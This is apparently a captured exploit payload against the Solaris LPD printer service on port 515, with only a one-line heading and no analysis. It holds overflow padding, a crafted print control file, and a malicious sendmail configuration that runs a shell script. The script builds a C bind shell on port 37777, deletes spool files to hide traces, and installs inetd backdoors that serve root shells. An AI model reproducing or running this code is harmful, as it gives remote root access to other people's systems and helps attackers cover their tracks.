Script used in the attack via port 515 (the LPD printer service) on 2001.1.178
                                                                                   
   <-- everything from here until the next comment is a single line -->
   <2>////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////////////////////////
   ///////////////////////////////////////////////////////////KARMAPOLICE          
   <--- end of the single line. Each line below is its own line from now on -->
   <2>107 cfA666owned                                                              
   Howned                                                                          
   P\"-C/var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/mail.cf\" nobody         
   fdfA666config                                                                   
   fdfA666script                                                                   
   <3>379 mail.cf                                                                  
   # Keep this simple, explicit, and redundant                                     
                                                                                   
   V8                                                                              
                                                                                   
   Ou0                                                                             
   Og0                                                                             
   OL0                                                                             
   Oeq                                                                             
   OQ/tmp                                                                          
                                                                                   
   FX|/bin/sh /var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/script             
                                                                                   
   S3                                                                              
   S0                                                                              
   R$+ $#local $@blah $:blah                                                       
   S1                                                                              
   S2                                                                              
   S4                                                                              
   S5                                                                              
                                                                                   
   Mlocal P=/bin/sh, F=S, S=0, R=0, A=sh /var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/script
   Mprog P=/bin/sh, F=S, S=0, R=0, A=sh /var/spool/lp/tmp/nfns02-1224.fns.embratel.net.br/script
                                                                                   
   <3>1567 script                                                                  
   #!/bin/sh                                                                       
                                                                                   
   PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/ucb:/usr/local/bin:/usr/local/sbin\
   :/usr/xpg4/bin ; export PATH                                                    
                                                                                   
   cd /tmp                                                                         
                                                                                   
   # A backdoor on a Solaris ephemeral port. We don't fork, so it dies when you're
   # done...                                                                       
                                                                                   
   #CC=gcc                                                                         
   CC=cc                                                                           
                                                                                   
   cat > shell.c << __EOF__                                                        
   #include                                                              
   #include                                                              
   #include                                                              
   #include                                                           
   #include                                                          
   #include                                                          
                                                                                   
   int                                                                             
   main(int argc, char **argv)                                                     
   {                                                                               
       int sd, cd;                                                                 
       unsigned short port;                                                        
       struct sockaddr_in saddr;                                                   
                                                                                   
       if(argc < 2) exit(EXIT_FAILURE);                                            
       port = (unsigned short) strtoul(argv[1], NULL, 0);                          
       memset(&saddr, 0, sizeof saddr);                                            
       saddr.sin_family = AF_INET;                                                 
       saddr.sin_port = htons(port);                                               
       saddr.sin_addr.s_addr = htonl(INADDR_ANY);                                  
       sd = socket(AF_INET, SOCK_STREAM, 0);                                       
       bind(sd, (struct sockaddr *) &saddr, sizeof saddr);                         
       listen(sd, 1);                                                              
       cd = accept(sd, NULL, NULL);                                                
       dup2(cd, STDIN_FILENO);                                                     
       dup2(cd, STDOUT_FILENO);                                                    
       dup2(cd, STDERR_FILENO);                                                    
       execl("/bin/sh", "sh", (char *) 0);                                         
       exit(0);                                                                    
   }                                                                               
   __EOF__                                                                         
                                                                                   
   $CC -o shell shell.c -lsocket                                                   
   ./shell 37777 &                                                                 
   rm -f shell.c shell                                                             
                                                                                   
   # Minor cleaning...                                                             
                                                                                   
   rm -rf /var/spool/lp/tmp/*                                                      
   rm -rf /var/spool/lp/requests/*                                                 
                                                                                   
   # Some inetd backdoors. Uncomment wisely...                                     
                                                                                   
   rm -f x                                                                         
   #echo "ingreslock stream tcp nowait root /bin/sh sh -i" >> x                    
   echo "courier stream tcp nowait root /bin/sh sh -i"    >> x                     
   #echo "ftp-data stream tcp nowait root /bin/sh sh -i"   >> x                    
   #echo "domain stream tcp nowait root /bin/sh sh -i"     >> x                    
   #echo "printer stream tcp nowait root /bin/sh sh -i"    >> x                    
   inetd -s x                                                                      
   rm -f x                                                                         
                                                                                   
   <2>!